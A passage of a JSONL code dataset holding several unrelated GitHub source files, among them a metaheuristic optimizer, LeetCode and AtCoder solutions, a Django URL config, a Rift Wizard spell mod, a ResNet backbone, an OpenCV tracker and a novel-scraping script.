8, 9, 10\n self.H_j = self.H_j * np.exp(-self.C_j * (1.0 / np.exp(-epoch / self.epoch) - 1.0 / self.T0))\n S_ij = self.K * self.H_j * self.P_ij\n gama = self.beta * np.exp(- ((self.p_best[i][self.ID_TAR][self.ID_FIT] + self.epsilon) /\n (self.pop_group[i][j][self.ID_TAR][self.ID_FIT] + self.epsilon)))\n X_ij = self.pop_group[i][j][self.ID_POS] + F * np.random.uniform() * gama * \\\n (self.p_best[i][self.ID_POS] - self.pop_group[i][j][self.ID_POS]) + \\\n F * np.random.uniform() * self.alpha * (S_ij * self.g_best[self.ID_POS] - self.pop_group[i][j][self.ID_POS])\n pos_new = self.amend_position(X_ij, self.problem.lb, self.problem.ub)\n pop_new.append([pos_new, None])\n if self.mode not in self.AVAILABLE_MODES:\n pop_new[-1][self.ID_TAR] = self.get_target_wrapper(pos_new)\n pop_new = self.update_target_wrapper_population(pop_new)\n self.pop_group[i] = pop_new\n self.pop = self.flatten_group__(self.pop_group)\n\n ## Update Henry's coefficient using Eq.8\n self.H_j = self.H_j * np.exp(-self.C_j * (1.0 / np.exp(-epoch / self.epoch) - 1.0 / self.T0))\n ## Update the solubility of each gas using Eq.9\n S_ij = self.K * self.H_j * self.P_ij\n ## Rank and select the number of worst agents using Eq. 11\n N_w = int(self.pop_size * (np.random.uniform(0, 0.1) + 0.1))\n ## Update the position of the worst agents using Eq. 12\n sorted_id_pos = np.argsort([x[self.ID_TAR][self.ID_FIT] for x in self.pop])\n\n pop_new = []\n pop_idx = []\n for item in range(N_w):\n id = sorted_id_pos[item]\n X_new = np.random.uniform(self.problem.lb, self.problem.ub)\n pos_new = self.amend_position(X_new, self.problem.lb, self.problem.ub)\n pop_idx.append(id)\n pop_new.append([pos_new, None])\n if self.mode not in self.AVAILABLE_MODES:\n pop_new[-1][self.ID_TAR] = self.get_target_wrapper(pos_new)\n pop_new = self.update_target_wrapper_population(pop_new)\n for idx, id_selected in enumerate(pop_idx):\n self.pop[id_selected] = pop_new[idx].copy()\n self.pop_group = self.create_pop_group(self.pop, self.n_clusters, self.n_elements)\n self.p_best = self.get_best_solution_in_team__(self.pop_group)\n","repo_name":"thieu1995/mealpy","sub_path":"mealpy/physics_based/HGSO.py","file_name":"HGSO.py","file_ext":"py","file_size_in_byte":6555,"program_lang":"python","lang":"en","doc_type":"code","stars":587,"dataset":"github-code","pt":"40"} +{"seq_id":"5860007214","text":"## 19. Remove Nth Node From End of List\n## https://leetcode.com/problems/remove-nth-node-from-end-of-list/\n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\nclass Solution:\n def removeNthFromEnd(self, head: ListNode, n: int) -> ListNode:\n nthhead = head\n tail = head\n count = 0\n while tail:\n tail = tail.next\n if not(tail):\n if nthhead==head and count==n-1:\n head = head.next\n else:\n nthhead.next = nthhead.next.next\n count+=1\n \n if count>n:\n nthhead = nthhead.next\n return head","repo_name":"sayanbasak0/letscode","sub_path":"python3/p19_medium.py","file_name":"p19_medium.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36394108445","text":"\"\"\"BM URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. 
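The `removeNthFromEnd` solution above walks the list while counting nodes from the head. The textbook alternative keeps two pointers a fixed gap apart, which also removes the special-casing for deleting the head node; a sketch:

```python
# Two-pointer gap technique: advance `lead` n+1 steps from a dummy node,
# then move both pointers in lockstep until `lead` falls off the end;
# `trail` then sits just before the node to drop.
class ListNode:
    def __init__(self, val=0, next=None):
        self.val = val
        self.next = next

def remove_nth_from_end(head: ListNode, n: int) -> ListNode:
    dummy = ListNode(0, head)       # dummy handles removing the head itself
    lead = trail = dummy
    for _ in range(n + 1):          # open a gap of n+1 between the pointers
        lead = lead.next
    while lead:
        lead, trail = lead.next, trail.next
    trail.next = trail.next.next    # unlink the target node
    return dummy.next
```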
Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', admin.site.urls),\n path('home', views.home),\n path('product', views.product_list),\n path('product/', views.product_detail),\n path('product/filter',views.product_filter),\n path('company', views.company_list),\n path('company/',views.company_detail),\n path('company/filter',views.company_filter),\n path('company/product/',views.company_product),\n # path('company/filter/count',views.company_count),\n path('customer', views.customer_list),\n path('customer/',views.customer_detail),\n path('customer/filter',views.customer_filter),\n path('category',views.category_list),\n path('category/',views.category_detail),\n path('category/filter',views.category_filter),\n path('category/product/',views.category_product),\n path('prodType',views.prodType_list),\n path('prodType/',views.prodType_detail),\n path('prodType/filter',views.prodType_filter),\n path('prodType/product/',views.prodType_product),\n path('state',views.state_list),\n path('state/',views.state_detail),\n path('state/filter',views.state_filter),\n path('state/product/',views.state_product),\n]\n","repo_name":"maagii9922/BM","sub_path":"BM/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23581364000","text":"N,Q = list(map(int,input().split()))\r\nS = input()\r\nslen = len(S)\r\nquery = [list(map(int,input().split())) for _ in range(Q)]\r\n \r\n# print(query)\r\n \r\n# abcdefghijk > fghijkabcde\r\n \r\n# print(S)\r\nidx = 0\r\nfor q in query:\r\n if q[0] == 1:\r\n idx += q[1]\r\n if idx >= slen:\r\n idx -= slen\r\n else:\r\n# if q[1]-idx-1 > slen:\r\n# print(S[q[1]-idx-1-slen], idx)\r\n# else:\r\n# print(S[q[1]-idx-1], idx)\r\n print(S[q[1]-idx-1])","repo_name":"takeharu73/atcoder","sub_path":"ABC/20220702_ABC258/C - Rotation.py","file_name":"C - Rotation.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71195170361","text":"from Level import *\n\n# Add the base directory to sys.path for testing- allows us to run the mod directly for quick testing\nimport sys\nsys.path.append('../..')\n\nimport Spells\nimport Upgrades\n\nimport mods.API_ChargedSpells.API_ChargedSpells as API_ChargedSpells\n\nprint(\"Basic Charged Spells Mod Loaded\")\nclass InstakillSpell(API_ChargedSpells.BoundSpell):\n\n\tdef on_init(self):\n\t\tsuper(InstakillSpell, self).on_init()\n\t\tself.name = \"Instakill\"\n\n\t\tself.damage = 999\n\t\tself.can_target_self = False\n\t\tself.level = 1 # self.level = 3 \n\t\tself.tags = [Tags.Arcane, Tags.Sorcery]\n\t\tself.bound_range = 10\n\t\tself.max_charges = 3\n\t\tself.required_charge = 4 # this is how many turns the spell must charge for\n\n\t\tself.charging_effect_color = Tags.Arcane.color\n\n\n\tdef on_cast(self, x, y):\n\t\t# deal damage to target\n\t\tself.caster.level.deal_damage(x, y, self.get_stat('damage'), Tags.Arcane, self) \n\t\tyield\n\t\treturn\n\n\t\n\tdef get_description(self):\n\t\ttry:\n\t\t\treturn (\"Spend {required_charge} turns charging to prepare this 
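The ABC258 rotation solution above tracks a running offset instead of rotating the string, wrapping manually with an `if`. The same trick reads a little cleaner with modulo arithmetic: for a right-rotation by `shift`, position `p` of the rotated string maps back to index `(p - 1 - shift) mod n` of the original:

```python
def answer_queries(S: str, queries):
    n, shift = len(S), 0
    out = []
    for q in queries:
        if q[0] == 1:
            shift = (shift + q[1]) % n          # accumulate the rotation
        else:
            out.append(S[(q[1] - 1 - shift) % n])
    return out

# Rotating "abcdef" right by 2 gives "efabcd": its 1st char is 'e', 6th is 'd'.
print(answer_queries("abcdef", [(1, 2), (2, 1), (2, 6)]))  # ['e', 'd']
```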
spell.\\n\"\n\t\t\t\t\t\"Channel the spell to charge it. Once prepared, it remains prepared until it's used again.\\n\"\n\t\t\t\t\t\"Deals [{damage}_arcane:arcane] damage to a target when used after being prepared.\").format(**self.fmt_dict())\n\t\texcept:\n\t\t\treturn 'error'\n\n\nSpells.all_player_spell_constructors.append(InstakillSpell)\n\nfrom CommonContent import SimpleMeleeAttack as SimpleMeleeAttack\nclass SummonEldrichIncantation(API_ChargedSpells.IncantationSpell):\n\tdef on_init(self):\n\t\tsuper(SummonEldrichIncantation, self).on_init()\n\t\tself.name = \"Summon Eldrich Thing\"\n\n\t\tself.range = 4\n\t\tself.max_charges = 3\n\t\tself.tags = [Tags.Conjuration, Tags.Arcane]\n\t\tself.level = 1 # self.level = 3\n\t\tself.required_charge = 5 # this is how many turns the spell must charge for\n\n\t\tself.minion_health = 50\n\t\tself.minion_damage = 15\n\n\t\tself.charging_effect_color = Tags.Arcane.color\n\t\t\n\n\tdef on_cast(self, x, y):\n\t\teldrichThing = Unit()\n\t\teldrichThing.max_hp = self.get_stat('minion_health')\n\t\teldrichThing.team = self.caster.team\n\t\teldrichThing.asset_name = os.path.join(\"..\",\"..\",\"mods\",\"BasicChargedSpells\",\"eldrich_thing\")\n\n\t\teldrichThing.name = \"Eldrich Thing\"\n\t\teldrichThing.sprite.color = Color(200, 50, 200)\n\t\teldrichThing.flying = False\n\t\teldrichThing.description = \"A basic eldrich horror\"\n\t\teldrichThing.spells.append(SimpleMeleeAttack(self.get_stat('minion_damage')))\n\t\teldrichThing.tags = [Tags.Arcane]\n\t\teldrichThing.resists[Tags.Arcane] = 100\n\n\t\tself.summon(eldrichThing, Point(x, y))\n\t\tyield\n\n\tdef get_description(self):\n\t\ttry:\n\t\t\treturn (\"Summon an eldrich thing after {required_charge} turns spent charging (channel the spell to charge it).\\n\"\n\t\t\t\t\t\"The thing has [{minion_health}_HP:minion_health].\\n\"\n\t\t\t\t\t\"Eldrich things have a melee attack which deals [{minion_damage}_physical:physical] damage.\").format(**self.fmt_dict())\n\t\texcept:\n\t\t\treturn 'error'\n\n\nSpells.all_player_spell_constructors.append(SummonEldrichIncantation)\n\n\nclass PowerupFireball(API_ChargedSpells.PowerupSpell):\n\tdef on_init(self):\n\t\tsuper(PowerupFireball, self).on_init()\n\t\tself.name = \"Inferno Fireball\"\n\n\t\tself.upgrades['set_bound_on_interrupted'] = (1, 1, \"Bound Fireball\", \"The fireball spell becomes bound when charging completes or is interrupted.\")\n\t\tself.upgrades['damage_boost_on_charge'] = (1, 1, \"Charge Damage\", \"The fireball spell deals 3 extra damage per turn charged.\")\n\n\t\tself.damage = 10\n\t\tself.can_target_self = False\n\t\tself.level = 1 # self.level = 2\n\t\tself.tags = [Tags.Fire, Tags.Sorcery]\n\t\tself.range = 15\n\t\tself.radius = 3\n\t\tself.max_charges = 10\n\t\tself.max_charge = 4 # this is how many turns the spell can charge for\n\n\n\tdef on_cast(self, x, y, turns_charged):\n\t\ttarget = Point(x, y)\n\n\t\tfor stage in Burst(self.caster.level, target, self.get_stat('radius') + turns_charged):\n\t\t\tfor point in stage:\n\t\t\t\tdamage = self.get_stat('damage') + 3*turns_charged\n\t\t\t\t\n\t\t\t\tself.caster.level.deal_damage(point.x, point.y, damage, Tags.Fire, self)\n\t\t\tyield\n\n\tdef get_description(self):\n\t\ttry:\n\t\t\treturn (\"Charge up and cast a fireball.\\n\"\n\t\t\t\t\t\"Each turn spent charging increases the radius by 1.\\n\"\n\t\t\t\t\t\"The fireball deals [{damage}_fire:fire] damage and has a base radius of {radius}.\\n\"\n\t\t\t\t\t\"The fireball can be charged for up to {max_charge} turns.\\n\"\n\t\t\t\t\t\"Channel 
the spell to charge it, and recast it before the charge limit is reached to cast the fireball.\").format(**self.fmt_dict())\n\t\texcept:\n\t\t\t\treturn 'error'\n\nSpells.all_player_spell_constructors.append(PowerupFireball)\n\n# credit to Anti-Tank Guided Missile#0888 for this idea\nclass ThunderingHail(API_ChargedSpells.DualEffectSpell):\n\tdef on_init(self):\n\t\tsuper(ThunderingHail, self).on_init()\n\t\tself.name = \"Thundering Hail\"\n\n\t\tself.can_target_self = False\n\t\tself.level = 1 # self.level = 3\n\t\tself.tags = [Tags.Lightning, Tags.Ice, Tags.Sorcery]\n\t\tself.range = 15\n\t\t\n\t\tself.radius = 4\n\t\tself.effect_1_radius_increase_per_turn = 1\n\t\tself.effect_1_base_damage = 2\n\t\tself.effect_1_damage_increase_per_turn = 1\n\n\t\tself.effect_2_base_radius = 4\n\t\tself.effect_2_radius_increase_per_turn = 1\n\t\tself.effect_2_base_damage = 11\n\t\tself.effect_2_damage_increase_per_turn = 1\n\n\t\tself.max_charges = 4\n\t\tself.max_charge = 3 # this is how many turns the spell can charge for\n\n\n\tdef get_impacted_tiles(self, x, y):\n\t\tradius = self.get_stat('radius')\n\t\treturn [p for stage in Burst(self.caster.level, Point(x, y), radius) for p in stage]\n\n\n\tdef on_cast1(self, x, y, turns_charged, turns_remaining):\n\t\ttarget = Point(x, y)\n\n\t\tfor stage in Burst(self.caster.level, target, self.get_stat('radius') + self.get_stat('effect_1_radius_increase_per_turn')*turns_charged):\n\t\t\tfor point in stage:\n\t\t\t\tdamage = self.get_stat('effect_1_base_damage') + self.get_stat('effect_1_damage_increase_per_turn')*turns_charged\n\t\t\t\t\n\t\t\t\tself.caster.level.deal_damage(point.x, point.y, damage, Tags.Ice, self)\n\t\t\t\tself.caster.level.deal_damage(point.x, point.y, damage, Tags.Physical, self)\n\t\t\t\t\n\t\t\tyield \n \n\t\treturn\n\n\t\n\tdef on_cast2(self, x, y, turns_charged):\n\t\ttarget = Point(x, y)\n\t\t\n\t\tfor stage in Burst(self.caster.level, target, self.get_stat('effect_2_base_radius') + self.get_stat('effect_2_radius_increase_per_turn')*turns_charged):\n\t\t\tfor point in stage:\n\t\t\t\tdamage = self.get_stat('effect_2_base_damage') + self.get_stat('effect_2_damage_increase_per_turn')*turns_charged\n\t\t\t\t\n\t\t\t\tself.caster.level.deal_damage(point.x, point.y, damage, Tags.Lightning, self)\n\t\t\t\t\n\t\t\tyield \n \n\t\treturn\n\n\tdef get_description(self):\n\t\ttry:\n\t\t\treturn (\"Cast a chargeable gravity well that reverses direction at the end of charging.\\n\"\n\t\t\t\t\t\"Each turn spent charging increases the radius and damage of the final effect by 1.\\n\"\n\t\t\t\t\t\"The final effect deals 11 Arcane and 11 Physical damage.\\n\"\n\t\t\t\t\t\"Each turn spent charging, units are pulled towards the center.\\n\"\n\t\t\t\t\t\"Channel the spell to charge it, and recast it before the charge limit is reached to cast the final effect.\").format(**self.fmt_dict())\n\t\texcept:\n\t\t\treturn 'error'\n\n\nSpells.all_player_spell_constructors.append(ThunderingHail)\n\n","repo_name":"FreezeDriedMangos/clays-riftwizard-mods","sub_path":"Singleplayer/BasicChargedSpells/BasicChargedSpells.py","file_name":"BasicChargedSpells.py","file_ext":"py","file_size_in_byte":7018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33399734872","text":"import torch\r\nimport random\r\nimport argparse\r\nfrom experiment import run_experiment\r\n\r\nmanualSeed = 0\r\nprint(\"Random Seed: \", manualSeed)\r\nrandom.seed(manualSeed)\r\ntorch.manual_seed(manualSeed)\r\n\r\nparser = 
argparse.ArgumentParser()\r\nparser.add_argument('--dataset', type = str, default=\"compas\", help=\"dataset to run(compas, framingham, adult, german)\")\r\nparser.add_argument('--eval_metric', type = str, default=\"xauc\", help=\"metric of ranking fairness, xauc or prf\")\r\nparser.add_argument('--classifier', type = str, default=\"lr\", help=\"classificaion model. lr for logistic regression, rb for rankboost\")\r\n\r\nif __name__ == \"__main__\":\r\n args = parser.parse_args()\r\n dataset, eval_metric, classifier = args.dataset, args.eval_metric, args.classifier\r\n print(\"Run experiment for classifier {}, metric {} on {} dataset\".format(classifier,eval_metric,dataset))\r\n run_experiment(dataset, eval_metric, classifier)\r\n\r\n","repo_name":"cuis15/xorder","sub_path":"run_experiment.py","file_name":"run_experiment.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"27183793169","text":"class Solution(object):\n def findWinners(self, matches):\n \"\"\"\n :type matches: List[List[int]]\n :rtype: List[List[int]]\n \"\"\"\n win = []\n los = []\n\n for m in matches:\n win.append(m[0])\n los.append(m[1])\n\n first = []\n second = [] \n count = Counter(los)\n for i in range(len(win)):\n if (count[win[i]] == 0):\n first.append(win[i])\n if (count[win[i]] == 1):\n second.append(win[i])\n if (count[los[i]] == 1):\n second.append(los[i])\n \n \n first = list(set(first))\n second = list(set(second))\n first.sort()\n second.sort()\n return [first, second]","repo_name":"Rouxxs/One-Leetcode-a-day-keeps-bug-away","sub_path":"Day 1 - 10/Day 1 - 2225. Find Players With Zero or One Losses.py","file_name":"Day 1 - 2225. Find Players With Zero or One Losses.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"17327721936","text":"# Tuples are a collection of Python objects much like a list but Tuples are immutable in nature i.e. \n# the elements in the tuple cannot be added or removed once created.\n# Tuples are more memory efficient than the lists. When it comes to the time efficiency, \n# tuples have a slight advantage over the lists especially when we consider lookup value. 
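`findWinners` above builds parallel winner/loser lists and re-scans them per player; note that, as shown, it also uses `Counter` without importing it. One `Counter` over the losers plus a single pass over the player set does the same work:

```python
from collections import Counter

def find_winners(matches):
    losses = Counter(loser for _, loser in matches)
    players = {p for match in matches for p in match}
    zero_loss = sorted(p for p in players if losses[p] == 0)
    one_loss = sorted(p for p in players if losses[p] == 1)
    return [zero_loss, one_loss]

print(find_winners([[1, 3], [2, 3], [3, 6], [5, 6], [5, 1]]))
# [[2, 5], [1]] -- players who never lost / lost exactly once
```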
\n# If you have data that shouldn't change, you should choose tuple data type over lists.\n\nmy_tuple = (2, 8, 1, 6, 10)\nprint(my_tuple)\n\n# Converting a list into a tuple\nlist = [\"Hi\", \"my\", \"name\", \"is\", \"Carson\"]\nlist = tuple(list)\nprint(list)","repo_name":"carsonshevlin/Data-Structures","sub_path":"tuples.py","file_name":"tuples.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71179387962","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom urllib.request import urlopen \nfrom bs4 import BeautifulSoup \nimport urllib.request\nimport re\n\n \ndef write_file(file_name, s_article):\n with open(file_name, 'a',encoding='utf8') as f:\n f.write(s_article) \n \n\ndef read_article_XiaoShuo_chapter(article_title,article_url):#从章节里读取内容,写入小说文件里\n headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) ' 'Chrome/51.0.2704.63 Safari/537.36'}\n req = urllib.request.Request(url=article_url, headers=headers)\n html = urllib.request.urlopen(req).read()#.decode('utf8')#, 'ignore' \n bsObj = BeautifulSoup(html, \"lxml\") \n chapter_title=bsObj.find('div',attrs={'class':'bookname'}).h1.get_text()\n print(chapter_title)\n write_file(article_title, '\\n'+chapter_title+'\\n')\n a_list=bsObj.findAll('div',attrs={'id':'content'}) \n for a in a_list:\n s=a.get_text()\n s1=re.sub(u'(\\xa0)+', '\\n',s)\n s2=re.sub('(.*--?)|(--.*--?)|(--.*)','',s1,flags=re.DOTALL)\n s2=re.sub('[a-zA-Z]+?','',s2,flags=re.DOTALL)\n write_file(article_title, s2+'\\n')\n\ndef read_article_title(article_url):\n headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) ' 'Chrome/51.0.2704.63 Safari/537.36'}\n req = urllib.request.Request(url=article_url, headers=headers)\n html = urllib.request.urlopen(req).read().decode('gbk')#, 'ignore' \n bsObj = BeautifulSoup(html, \"lxml\") \n \n article_title=bsObj.div.h1.get_text()+'.txt' #获得小说名字\n for ch in bsObj.find('div',attrs={'id':'list'}).findAll('a',attrs={'href':True}):#获取小说链接\n chapter_name=ch.get_text()#章节名称\n chapter_href=ch.get('href')#章节链接\n# print(ch.get_text(),' ',chapter_href)\n read_article_XiaoShuo_chapter(article_title,chapter_href)\nread_article_title('http://www.ranwen.net/files/article/81/81269/')\n","repo_name":"Jay1998/FetchNovel","sub_path":"src/从燃文下载小说.py","file_name":"从燃文下载小说.py","file_ext":"py","file_size_in_byte":2021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36491518721","text":"from clase import Clase\nimport csv\n\ndef carga_archivo(nameFile):\n lista = []\n file = open(nameFile)\n csvreader = csv.reader(file)\n for row in csvreader:\n id = row[0]\n name = row[1]\n born = row[2]\n newclase = Clase(id, name, born)\n lista.append(newclase)\n return(lista)\n\ndef fun_reverse(lista):\n lista.reverse()\n print(lista)\n\n\ndef main():\n lista = carga_archivo('dataset.csv')\n fun_reverse(lista)\n\n\nif __name__ == '__main__':\n main()","repo_name":"Sphinx0102/poo-ejercicios","sub_path":"unidad-2/Trabajo de investigacion/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"558791865","text":"# -*- coding: utf-8 -*-\n\nimport math\nimport torch\nimport torch.nn as nn\nfrom torch.utils import model_zoo\nfrom models.sync_batchnorm.batchnorm import 
SynchronizedBatchNorm2d\n\n\nmodel_urls = {\n 'resnet18': 'https://download.pytorch.org/models/resnet18-5c106cde.pth',\n 'resnet34': 'https://download.pytorch.org/models/resnet34-333f7ec4.pth',\n}\n\n\nclass BasicBlock(nn.Module):\n expansion = 1\n\n def __init__(self, inplanes, planes, stride=1, downsample=None, dilation=1, BatchNorm=None):\n super(BasicBlock, self).__init__()\n # self.conv1 = conv3x3(inplanes, planes, stride=stride, dilation=dilation)\n self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=3, stride=stride,\n padding=dilation, dilation=dilation, bias=False)\n self.bn1 = BatchNorm(planes)\n self.relu = nn.ReLU(inplace=True)\n # self.conv2 = conv3x3(planes, planes, stride=1, dilation=dilation)\n self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=1,\n padding=dilation, dilation=dilation, bias=False)\n self.bn2 = BatchNorm(planes)\n self.downsample = downsample\n self.stride = stride\n\n def forward(self, x):\n residual = x\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n\n if self.downsample is not None:\n residual = self.downsample(x)\n\n out += residual\n out = self.relu(out)\n\n return out\n\n\nclass ResNet(nn.Module):\n def __init__(self, backbone, block, layers, BatchNorm, in_channels=3, \n pretrained=True):\n self.backbone = backbone\n \n self.inplanes = 64\n super(ResNet, self).__init__()\n self.conv1 = nn.Conv2d(in_channels, 64, kernel_size=7, stride=2, padding=3,\n bias=False)\n self.bn1 = BatchNorm(64)\n self.relu = nn.ReLU(inplace=True)\n self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)\n self.layer1 = self._make_layer(block, 64, layers[0], BatchNorm=BatchNorm)\n self.layer2 = self._make_layer(block, 128, layers[1], stride=2, BatchNorm=BatchNorm)\n self.layer3 = self._make_layer(block, 256, layers[2], stride=1, dilation=2, BatchNorm=BatchNorm)\n self.layer4 = self._make_layer(block, 512, layers[3], stride=1, dilation=4, BatchNorm=BatchNorm)\n \n self._init_weight()\n\n if pretrained:\n self._load_pretrained_model()\n\n def _make_layer(self, block, planes, blocks, stride=1, dilation=1, BatchNorm=None):\n downsample = None\n if stride != 1 or self.inplanes != planes * block.expansion:\n downsample = nn.Sequential(\n nn.Conv2d(self.inplanes, planes * block.expansion,\n kernel_size=1, stride=stride, bias=False),\n BatchNorm(planes * block.expansion),\n )\n\n layers = [block(self.inplanes, planes, stride, downsample, BatchNorm=BatchNorm)]\n self.inplanes = planes * block.expansion\n for i in range(1, blocks):\n layers.append(block(self.inplanes, planes, dilation=dilation, BatchNorm=BatchNorm))\n\n return nn.Sequential(*layers)\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.bn1(x)\n x = self.relu(x)\n x = self.maxpool(x)\n\n x = self.layer1(x)\n low_level_feat = x\n x = self.layer2(x)\n x = self.layer3(x)\n x = self.layer4(x)\n\n return x, low_level_feat\n \n def _init_weight(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(0, math.sqrt(2. 
/ n))\n elif isinstance(m, SynchronizedBatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n \n def _load_pretrained_model(self):\n if self.backbone == 'resnet34':\n pretrain_dict = model_zoo.load_url(model_urls['resnet34'])\n elif self.backbone == 'resnet18':\n pretrain_dict = model_zoo.load_url(model_urls['resnet18'])\n else:\n NotImplementedError\n \n model_dict = {}\n state_dict = self.state_dict()\n for k, v in pretrain_dict.items():\n if k in state_dict:\n model_dict[k] = v\n state_dict.update(model_dict)\n self.load_state_dict(state_dict)\n\n\ndef resnet18(in_channels, BatchNorm, pretrained=True):\n if in_channels!=3 and pretrained:\n raise ValueError(\"pretraining is allowed only if input channels is 3\")\n model = ResNet('resnet18', BasicBlock, [2, 2, 2, 2], BatchNorm, \n in_channels=in_channels, pretrained=pretrained)\n return model\n\n\ndef resnet34(in_channels, BatchNorm, pretrained=True):\n if in_channels!=3 and pretrained:\n raise ValueError(\"pretraining is allowed only if input channels is 3\")\n model = ResNet('resnet34', BasicBlock, [3, 4, 6, 3], BatchNorm, \n in_channels=in_channels, pretrained=pretrained)\n return model\n\n'''\nimport time\nstart = time.time()\nif __name__ == \"__main__\":\n model = resnet18(in_channels=3, BatchNorm=nn.BatchNorm2d, pretrained=True)\n input = torch.rand(1, 3, 256, 256)\n output, low_level_feat = model(input)\n print(output.size())\n print(low_level_feat.size())\nend = time.time()\nprint(end-start)\n'''\n\n","repo_name":"renzhenwang/pairwise_segmentation","sub_path":"models/backbone/shallow_resnet.py","file_name":"shallow_resnet.py","file_ext":"py","file_size_in_byte":5615,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"40"} +{"seq_id":"4295070120","text":"import cv2\nimport sys\nfrom random import randint\n\n\n# In tracking, our goal is to find an object in the current frame given we have tracked the object successfully in all ( or nearly all ) previous frames\n# https://www.learnopencv.com/object-tracking-using-opencv-cpp-python/\n\nif __name__ == \"__main__\":\n\n vid = cv2.VideoCapture(\"../dataset/test.mp4\")\n if not vid.isOpened():\n raise IOError(\"Couldn't open webcam or video\")\n\n # Multi tracker init\n trackers = cv2.MultiTracker_create()\n\n while True:\n return_value, frame = vid.read()\n\n if not return_value:\n break\n\n rects = []\n \n # get updated location of objects in subsequent frames\n success, boxes = trackers.update(frame)\n for box in boxes:\n (x, y, w, h) = [int(v) for v in box]\n cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 2)\n \n cv2.imshow(\"Frame\", frame)\n key = cv2.waitKey(1) & 0xFF\n\n # if the 'p' key is selected, we select a bounding box to track\n if key == ord(\"p\"):\n # select the bounding box of the object we want to track (make\n # sure you press ENTER or SPACE after selecting the ROI)\n box = cv2.selectROI(\"Frame\", frame, fromCenter=False,\n showCrosshair=True)\n \n # create a new object tracker for the bounding box and add it\n # to our multi-object tracker\n tracker = cv2.TrackerCSRT_create()\n trackers.add(tracker, frame, box)\n # if the `q` key was pressed, break from the loop\n elif key == ord(\"q\"):\n break\n\n vid.release()\n 
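Layers 3 and 4 of the backbone above use `stride=1` with `dilation=2` and `4`, relying on the identity that a 3x3 convolution with `padding == dilation` preserves spatial size (out = H + 2d - 2d - 1 + 1 = H). A two-line check:

```python
import torch
import torch.nn as nn

x = torch.rand(1, 64, 64, 64)
for d in (1, 2, 4):
    conv = nn.Conv2d(64, 64, kernel_size=3, stride=1, padding=d, dilation=d, bias=False)
    print(d, tuple(conv(x).shape))   # spatial dims stay (64, 64) for every d
```

This is why the backbone can trade stride for dilation in its deeper stages: the receptive field keeps growing while the feature map stops shrinking.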
cv2.destroyAllWindows()","repo_name":"palarax/capstone","sub_path":"tests/tracker.py","file_name":"tracker.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"42574550157","text":"from skimage.io import imread\nfrom skimage.transform import resize\nimport cv2 as cv\nfrom sklearn.svm import LinearSVC, SVC\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom detector.config import *\nimport os\nfrom itertools import product\nfrom detector.extract_feature import extract_hog\n\n# 从config读取hog模型参数\nparams_hog = {'orientations': orientations,\n 'pixels_per_cell': pixels_per_cell,\n 'cells_per_block': cells_per_block,\n 'visualize': visualize,\n 'transform_sqrt': transform_sqrt}\n\n# 提前构建后续使用的变量,清除Pycharm报错\ntrain_pos_num = 1\ntrain_neg_num = 1\ntest_pos_num = 1\ntest_neg_num = 1\ntrain_pos_data = None\ntrain_neg_data = None\ntest_pos_data = None\ntest_neg_data = None\ntrain_pos_hog = None\ntrain_neg_hog = None\ntest_pos_hog = None\ntest_neg_hog = None\n\n# 读取所有图片数据,并保存\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nfor mode, category in product(('train', 'test'), ('pos', 'neg')):\n # 此变量为图片父目录,例:train_pos_path\n locals()[mode + '_' + category + '_path'] = BASE_DIR 